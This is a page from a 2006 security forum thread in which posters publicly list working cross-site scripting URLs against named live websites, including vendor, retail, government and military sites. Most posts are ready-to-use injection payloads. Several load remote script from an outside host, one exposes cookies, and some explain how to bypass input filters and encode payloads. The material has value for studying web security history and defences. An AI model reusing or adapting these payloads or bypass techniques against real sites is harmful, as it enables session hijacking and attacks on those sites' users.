Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 65
Re: So it begins
Posted by: thomaspollet
Date: September 29, 2006 05:31AM

I reported xss in myheadlines phpnuke module, yet it's still live on some places:

http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 12:47PM

thomaspollet Wrote:
-------------------------------------------------------
> I reported xss in myheadlines phpnuke module, yet
> it's still live on some places:
>
> http://cccure.org/modules.php?op=modload&name=MyHe
> adlines&file=index&myh=user&myh_op=show_all%22%3E%
> 3Cscript%3Ealert(2)%3C/script%3E&eid=2474

That's because people have to update their nuke. The phpnuke.org search hole should have been fixed by now, because I remember being able to do the IFrame in 7.9 when it was posted on waraxe's site, and they released 8.0 (which they're using on their site) a while ago.



Edited 1 time(s). Last edit at 09/29/2006 12:48PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 01:20PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://linksys.com/servlet/Satellite?email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&temp_email=&passcode='';!--&tenp_passcode='';!--&fieldsOnForm=email,passcode,&mag=&submitType=done&SubmittedElement=Linksys/ProductReg/CustomerLogin&childpagename=US/Layout&packedargs=siteid%3D1115416834707%26lang%3Den%26site%3DUS%26cid%3D1115416906014%26c%3DL_Content_C1&pagename=Linksys/Common/VisitorWrapper&FormName=reg&Attachment=false - Linksys.com
http://www.thawte.com/ucgi/search.cgi?menu1=make+your+selection+%3E%3E&Search=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&x=3&y=5
Look at what is suposedly ignored.




Edited 2 time(s). Last edit at 09/29/2006 02:10PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 02:26PM

http://www.certicom.com/index.php?keywords=asdf%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&Submit=Submit&action=res%2Csearch_site

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 02:31PM

http://search4.unisys.com/especific/search_results.asp?qstr=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&totDocs=0&totFtDocs=0&qryoption=allofthewords&extension=&changeDisplay=0&qstrTemp=asdf%27e&SiteToSearch=http%3A%2F%2Fwww.unisys.com%2Fabout__unisys%2F*&section=&Search=Search&summ=detailed&docsPP=20&s=&se=&b=about__unisys&p=3&e=none&sf=corporate&ci=about__unisys&ce=company__profile

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 02:57PM

http://app.subscribermail.com/add_mail.cfm?optinparam=redirectwelcome&ovr_redirection_url=http%3A%2F%2Fwww.trustestage.com%2Fsubconfirm.html&ppid=TRUSD6C93DDB&version=v3&email=XSS%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&mailtype=1&Submit=Submit - TRUSTe newsletter.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.truste.org/pvr.php%3fpage=complaint&PHPSESSID=3e5f80c5ff71a277bc238b19d650ad22&url=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&_submit=Next - Yet another TRUSTe.



Edited 1 time(s). Last edit at 09/29/2006 03:00PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 03:42PM

I'm not sure what the web designer was thinking for this, but it doesn't filter any input.. *unless* you include <script> or </script> .. then it filters it all. But my guess is they got too many complaints from people named O'Brien showing up as O\'Brien ..

Potentially a very exploitable hole for fun and profit. _-_

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://zme.amazon.com/exec/varzea/fx-register/process-login/102-5551194-3126502&login-customer=existing&login-email=XSSman&input-login-email=%22%3E%3CBODY+ONLOAD%3D'a=%22Your%20Cookies:%5Cn%5Cn%5Cn%22%2Bdocument.cookie;alert%28a%29'%3E%3Cx%20+&input-login-customer=existing&password=&x=0&y=0 zme.amazon.com

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 04:52PM

http://www.afpc.randolph.af.mil/external.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 04:58PM

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=Weapons%20of%20Mass%20Destruction%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 05:26PM

http://ohrm.os.doc.gov/search/index.htm?ssUserText=Osama+Bin+Laden%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 05:59PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.geeksquad.com/email/HighLevel.php&email=XSSman<script>alert(%22XSS%22)</script>&Sign+Up.x=0&Sign+Up.y=0&Sign+Up=Sign+Up geeksquad.com

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 06:01PM

http://www.compusa.com/products/products.asp?N=0&Ntt=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Ntk=All&Nty=1&D=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Dx=mode%20matchall

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 06:57PM

Heh, here's a funny example of when two filters work against each other. it doesn't filter out ' " > < .. they may need them for their encoded tracking numbers. (the form checks your order status). Instead they filter out all <script* and </script* and go to an error page. That's easy enough to get around with a <body onload=alert()>

The second filter erases all spaces though, since tracking numbers have none. This turns the workaround into <bodyonload=alert()>. That eliminates every other vector i know of. Except, now it bypassed the first filter:
<scr ipt>alert()</scr ipt>
will now execute when spaces are removed ^^

ironically, switching the order of the filters would be an almost effective filter (except for style="bind/expression")

http://www.newegg.com/CustomerService/TrackOrder.asp?TrackingNumber=+XSSman%22%3E%3Cscr+ipt%3Ealert%28%22XSS%22%29%3C%2Fscr+ipt%3E%3Cx&Action=NEW

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 07:15PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.techpowerup.org/upload.php&MAX_FILE_SIZE=2097152&file=&url=http://asdf%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&resize=0&dx=0&dy=0&watermark=9&tagline=&font=arial&textcol=%2523000000&size=12&bgcol=%2523FFFFFF&bgalpha=20&tagpos=1 techpowerup.com .. unfiltered php error

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 29, 2006 07:16PM

Hah. That's quite neat actually.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 07:33PM

http://www.frozencpu.com/process?mv_session_id=tdVJ23D9&mv_nextpage=problem&mv_form_profile=check_problem&mv_todo=return&p_fname=XSSman+for+ff%22+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29&p_lname=XSSman+for+ie%22+style%3D%27xx%3Aexpression%28alert%28%22XSS%22%29%29%27&p_email=&p_subject=&p_category=general&p_comments=%0D%0A&mv_click_map=Send&mv_click_Send=Send

filters by deleting the < .. so used parameter injection

anyone know of an injection like these two for autoexecuting in opera? it only has 1% market share.. but still nice for completion.

firefox: style=-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')
ie: style="expression(alert('XSS'))"

-maluc



Edited 1 time(s). Last edit at 09/29/2006 07:41PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 07:39PM

http://searchg.symantec.com/search?q=%22%3Balert%28%27xss%27%29%3Bs.prop5%3D%22&site=symc_en_US&btnG.x=0&btnG.y=0&btnG=OK&hitsceil=100&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&client=symc_en_US&charset=utf-8&context=gbh&y=0&oe=UTF-8&ie=UTF-8&proxystylesheet=symc_en_US&x=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 29, 2006 07:46PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://odds.proboards24.com/index.cgi?action=register2&username=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E <-- any proboards forum.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:02PM

heh, symantec.. good job

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 08:22PM

http://www.tv/en-def-8b35e4129716/cgi-bin/multilookup.cgi?domain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&tld=tv&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:33PM

http://knowledge.mcafee.com/SupportSite/search.do?languages=XSSman'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&rwTarget=%2FrfPlayerWidget.do&searchMode=GuidedSearch&searchString=&product=hhhhh&document=&cmd=search&productFamily=&contextType=gs

as far as i can see, it's an unused field, so overlooked for filtering _-_

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:37PM

in case symantec and mcafee were lonely https://www.zonelabs.com/store/application?namespace=zls_user&origin=login.jsp&event=button.login&zl_user_name=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&destination=global.jsp&zl_user_password=&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 09:25PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://reg.imageshack.us/content.php?page=email&name=Null&email=XSS%22%3E%3Cscript%20src=http://ha.ckers.org/xss.jpg%20@null.org&subj=XML+API+Request&corresp=Partnerships&idea=Null&ip=0.0.0.0&q=marketing - imageshack.us

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 10:04PM

nice find guys. must be all teh honeypots.

anyways - i going away for a few days so don't think i have finished just yet becuase i ain't posting.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:07PM

I sure wish acunetix would take down the honeypot on their main page. :(
C-ya when you get back digital. I'm leaving for california on Monday myself.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:09PM

http://usa.kaspersky-labs.com/trials/trialsregHOME.php?aw=Trials+Page&ref=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&chapter=146481750
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://usa.kaspersky-labs.com/trials/trials_postHOME.php&oid=00D300000000WYS&retURL=http%3A%2F%2Fusa.kaspersky-labs.com%2Ftrials%2Ftrial_thanks.php&Campaign_ID=Campaign_Adwords&aw=Trials+Page&ref=%5C&chapter=146481750&email=XSSman%22><script>alert(String.fromCharCode(88,83,83))</script>@dev.null&Submit.x=0&Submit.y=0&Submit=Submit&optin=yes also usa.kaspersky-labs.com

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:11PM

http://adidas.com - adidas.com/us/shared/help/help_contact-us.asp?strCountry=us&strBrand="/>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
http://dictionary.com - dictionary.reference.com/search?q=%22';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}&x=0&y=0

I can't get it to post right maluc, see if you can try. It cuts off at the first //\.



Edited 14 time(s). Last edit at 09/29/2006 10:46PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: XSSman
Date: September 29, 2006 10:36PM

ghozt, you have to hex encode somes of the characters for the script here.. especially " to %22

and: { to %7B .. } to %7D .. + to %2B .. i think thats all of them

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:45PM

disclosed by Ghozt, just click-friendly:
http://www.adidas.com/us/shared/legal.asp?strCountry=us&strBrand=%22);alert(%22XSS%22)%3C/SCRIPT%3E<x
http://dictionary.reference.com/search?q=';alert(%22XSS%22);x='&x=0&y=0

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:47PM

Ah. Thanks maluc. :)

Options: ReplyQuote
Pages: PreviousFirst...7891011121314151617...LastNext
Current Page: 12 of 65


Sorry, only registered users may post in this forum.